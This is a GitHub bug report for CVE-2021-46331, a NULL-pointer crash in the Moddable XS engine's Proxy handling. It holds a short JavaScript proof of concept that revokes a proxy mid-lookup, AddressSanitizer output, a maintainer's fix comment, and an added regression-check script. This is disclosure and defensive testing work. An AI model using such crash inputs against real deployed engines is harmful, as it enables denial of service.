CVE-2021-46331: SEGV xs/sources/xsProxy.c:506 in fxProxyGetPrototype · Issue #750 · Moddable-OpenSource/moddable

Moddable SDK v11.5.0 was discovered to contain a SEGV vulnerability via xs/sources/xsProxy.c in fxProxyGetPrototype.


SEGV xs/sources/xsProxy.c:506 in fxProxyGetPrototype #750

Closed · hope-fly opened this issue Dec 14, 2021 · 1 comment

Moddable-XS revision

Commit: db8f973

Version: 11.5.0 32 4

Build environment

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

cd ~/moddable/xs/makefiles/lin
#(debug)
make -f xst.mk

Test case

function JSEtest(proxyTarget) {
  var { proxy, revoke } = Proxy.revocable(proxyTarget, new Proxy({}, {
    get(target, propertyKey, receiver) {
      revoke();
    }
  }));
  return proxy;
}

Object.getPrototypeOf(JSEtest({}));

Execution & Output

$ ./moddable/build/bin/lin/debug/xst poc.js

ASAN:DEADLYSIGNAL
==68595==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000009 (pc 0x55aceefcfbc1 bp 0x7ffebf0ad710 sp 0x7ffebf0ad6c0 T0)
==68595==The signal is caused by a READ memory access.
==68595==Hint: address points to the zero page.
    #0 0x55aceefcfbc0 in fxProxyGetPrototype /root/moddable/xs/sources/xsProxy.c:506
    #1 0x55acef001f0f in fxRunID /root/moddable/xs/sources/xsRun.c:842
    #2 0x55acef06cc27 in fxRunScript /root/moddable/xs/sources/xsRun.c:4766
    #3 0x55acef27e90a in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387
    #4 0x55aceeba54c7 in main /root/moddable/xs/tools/xst.c:281
    #5 0x7f00319aabf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
    #6 0x55aceeba70c9 in _start (/root/moddable/build/bin/lin/debug/xst+0x950c9)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/moddable/xs/sources/xsProxy.c:506 in fxProxyGetPrototype
==68595==ABORTING

Credits: Found by OWL337 team.

mkellner pushed a commit that referenced this issue Dec 21, 2021

phoddie (Collaborator) commented Dec 21, 2021

This is a far-reaching bug: the Proxy implementation was not defending against NULL target (e.g. a revoked proxy) in many paths. We have reviewed the implementation to try to resolve all of those.
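The comment above says the missing NULL-target check affected many Proxy paths, not only getPrototypeOf. As an added example (not code from the issue or from the Moddable SDK), this regression check extends the issue's test case to the other object internal methods: per ECMAScript the engine reads the target before it looks up the trap, so the call that triggers the revoke completes against the original target and every later call throws TypeError. The names makeSelfRevoking, OPERATIONS, outcome and checkRevokedProxyPaths are hypothetical.

```javascript
// Added regression check; not code from the issue or from the Moddable SDK.
// makeSelfRevoking mirrors the issue's JSEtest: the handler is itself a Proxy
// whose `get` trap revokes the outer proxy while the engine looks up a trap.
function makeSelfRevoking(target) {
  const { proxy, revoke } = Proxy.revocable(target, new Proxy({}, {
    get() { revoke(); } // returns undefined, i.e. "no trap defined"
  }));
  return proxy;
}

// Each Reflect function invokes exactly one proxy internal method.
// [[Set]] is left out: with the revoked proxy as receiver it throws TypeError
// during the first call, so it does not fit the ok/TypeError pattern below.
const OPERATIONS = {
  getPrototypeOf: (p) => Reflect.getPrototypeOf(p), // path reported in #750
  setPrototypeOf: (p) => Reflect.setPrototypeOf(p, null),
  isExtensible: (p) => Reflect.isExtensible(p),
  preventExtensions: (p) => Reflect.preventExtensions(p),
  getOwnPropertyDescriptor: (p) => Reflect.getOwnPropertyDescriptor(p, "x"),
  defineProperty: (p) => Reflect.defineProperty(p, "y", { value: 2 }),
  has: (p) => Reflect.has(p, "x"),
  get: (p) => Reflect.get(p, "x"),
  deleteProperty: (p) => Reflect.deleteProperty(p, "x"),
  ownKeys: (p) => Reflect.ownKeys(p),
};

// Classify a call: completed, threw the expected TypeError, or something else.
function outcome(fn) {
  try { fn(); return "ok"; }
  catch (e) { return e instanceof TypeError ? "TypeError" : "unexpected: " + e; }
}

// For every operation: the first call revokes the proxy mid-lookup, the
// second call hits a proxy whose target and handler are already null.
function checkRevokedProxyPaths() {
  const report = {};
  for (const [name, op] of Object.entries(OPERATIONS)) {
    const proxy = makeSelfRevoking({ x: 1 }); // constructed sample target
    report[name] = {
      duringRevoke: outcome(() => op(proxy)),
      afterRevoke: outcome(() => op(proxy)),
    };
  }
  return report;
}
```

Run it under the engine being tested: an entry other than ok / TypeError, or a process abort before the report is returned, marks a path that still lacks the revoked-proxy guard.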
